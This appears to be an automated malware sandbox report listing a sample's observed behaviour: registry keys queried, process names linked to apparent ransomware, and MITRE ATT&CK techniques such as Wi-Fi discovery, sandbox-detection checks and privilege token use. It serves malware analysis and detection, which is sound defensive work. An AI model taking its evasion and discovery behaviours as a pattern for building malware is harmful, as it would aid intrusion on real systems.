Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cyber Sniff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kitty_portable.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cooker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoClicker-3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2080	cmd.exe
708	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
5076	NETSTAT.EXE

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
3016	WMIC.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2372	WMIC.exe

Enumerates system info in registry 2 TTPs 24 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3572	ipconfig.exe
5076	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2988	systeminfo.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
3380	taskkill.exe

Modifies Control Panel 24 IoCs

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\cursors\\aero_nwse.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\cursors\\aero_nesw.cur"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Desktop\UserPreferencesMask = 9e1e078012000000	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\cursors\\aero_working.ani"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\Wait = "C:\\Windows\\cursors\\aero_busy.ani"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\cursors\\aero_ns.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Appearance\Current	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Accessibility\HighContrast	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Accessibility\HighContrast\Previous High Contrast Scheme MUI Value	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\No = "C:\\Windows\\cursors\\aero_unavail.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\cursors\\aero_ew.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\ = "Windows Aero"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Accessibility\HighContrast\Flags = "126"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Accessibility\HighContrast\High Contrast Scheme	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\cursors\\aero_arrow.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\cursors\\aero_pen.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\cursors\\aero_move.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\cursors\\aero_up.cur"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\Scheme Source = "2"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Appearance	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Appearance\NewCurrent	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\Help = "C:\\Windows\\cursors\\aero_helpsel.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Cursors\Hand = "C:\\Windows\\cursors\\aero_link.cur"	rundll32.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133891146632227153"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 17 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{9E93E17D-95D7-430B-AD27-C83BEE8ED60A}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104"	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{D872A45F-85EB-427F-B364-C33E03D3302A}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{33D8433C-A1B2-4FA2-8FDD-DF8FE7851822}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{57805840-D977-4D35-9907-2CBFCE29E0A9}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{41094238-12C8-4565-9436-ECBB4BCCBB30}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{B5EB70BD-0ADE-4E17-9E55-A00BDB4BF79E}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3924	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1864	powershell.exe
1864	powershell.exe
5112	powershell.exe
5112	powershell.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe
6104	taskhsvc.exe
6104	taskhsvc.exe
6104	taskhsvc.exe
6104	taskhsvc.exe
6104	taskhsvc.exe
6104	taskhsvc.exe
2108	chrome.exe
2108	chrome.exe
5308	msedge.exe
5308	msedge.exe
2108	chrome.exe
2108	chrome.exe
3736	chrome.exe
3736	chrome.exe
1288	msedge.exe
1288	msedge.exe
2332	msedge.exe
2332	msedge.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5572	setup.exe
5572	setup.exe
5084	taskmgr.exe
5084	taskmgr.exe
5572	setup.exe
5572	setup.exe
5084	taskmgr.exe
5084	taskmgr.exe
5572	setup.exe
5572	setup.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5572	setup.exe
5572	setup.exe
5572	setup.exe
5572	setup.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe
5084	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
5004	AutoClicker-3.1.exe
2404	kitty_portable.exe
5160	@[email protected]
7236	7zG.exe
5084	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1736	msedge.exe
1736	msedge.exe
1736	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeIncreaseQuotaPrivilege	5668	WMIC.exe
Token: SeSecurityPrivilege	5668	WMIC.exe
Token: SeTakeOwnershipPrivilege	5668	WMIC.exe
Token: SeLoadDriverPrivilege	5668	WMIC.exe
Token: SeSystemProfilePrivilege	5668	WMIC.exe
Token: SeSystemtimePrivilege	5668	WMIC.exe
Token: SeProfSingleProcessPrivilege	5668	WMIC.exe
Token: SeIncBasePriorityPrivilege	5668	WMIC.exe
Token: SeCreatePagefilePrivilege	5668	WMIC.exe
Token: SeBackupPrivilege	5668	WMIC.exe
Token: SeRestorePrivilege	5668	WMIC.exe
Token: SeShutdownPrivilege	5668	WMIC.exe
Token: SeDebugPrivilege	5668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5668	WMIC.exe
Token: SeRemoteShutdownPrivilege	5668	WMIC.exe
Token: SeUndockPrivilege	5668	WMIC.exe
Token: SeManageVolumePrivilege	5668	WMIC.exe
Token: 33	5668	WMIC.exe
Token: 34	5668	WMIC.exe
Token: 35	5668	WMIC.exe
Token: 36	5668	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2372	WMIC.exe
Token: SeSecurityPrivilege	2372	WMIC.exe
Token: SeTakeOwnershipPrivilege	2372	WMIC.exe
Token: SeLoadDriverPrivilege	2372	WMIC.exe
Token: SeSystemProfilePrivilege	2372	WMIC.exe
Token: SeSystemtimePrivilege	2372	WMIC.exe
Token: SeProfSingleProcessPrivilege	2372	WMIC.exe
Token: SeIncBasePriorityPrivilege	2372	WMIC.exe
Token: SeCreatePagefilePrivilege	2372	WMIC.exe
Token: SeBackupPrivilege	2372	WMIC.exe
Token: SeRestorePrivilege	2372	WMIC.exe
Token: SeShutdownPrivilege	2372	WMIC.exe
Token: SeDebugPrivilege	2372	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2372	WMIC.exe
Token: SeRemoteShutdownPrivilege	2372	WMIC.exe
Token: SeUndockPrivilege	2372	WMIC.exe
Token: SeManageVolumePrivilege	2372	WMIC.exe
Token: 33	2372	WMIC.exe
Token: 34	2372	WMIC.exe
Token: 35	2372	WMIC.exe
Token: 36	2372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5668	WMIC.exe
Token: SeSecurityPrivilege	5668	WMIC.exe
Token: SeTakeOwnershipPrivilege	5668	WMIC.exe
Token: SeLoadDriverPrivilege	5668	WMIC.exe
Token: SeSystemProfilePrivilege	5668	WMIC.exe
Token: SeSystemtimePrivilege	5668	WMIC.exe
Token: SeProfSingleProcessPrivilege	5668	WMIC.exe
Token: SeIncBasePriorityPrivilege	5668	WMIC.exe
Token: SeCreatePagefilePrivilege	5668	WMIC.exe
Token: SeBackupPrivilege	5668	WMIC.exe
Token: SeRestorePrivilege	5668	WMIC.exe
Token: SeShutdownPrivilege	5668	WMIC.exe
Token: SeDebugPrivilege	5668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5668	WMIC.exe
Token: SeRemoteShutdownPrivilege	5668	WMIC.exe
Token: SeUndockPrivilege	5668	WMIC.exe
Token: SeManageVolumePrivilege	5668	WMIC.exe
Token: 33	5668	WMIC.exe
Token: 34	5668	WMIC.exe
Token: 35	5668	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2404	kitty_portable.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
5004	AutoClicker-3.1.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
2404	kitty_portable.exe
2404	kitty_portable.exe
1736	msedge.exe
1736	msedge.exe
3652	PACKED.exe
5160	@[email protected]
5856	msedge.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
4004	taskmgr.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
1860	msedge.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
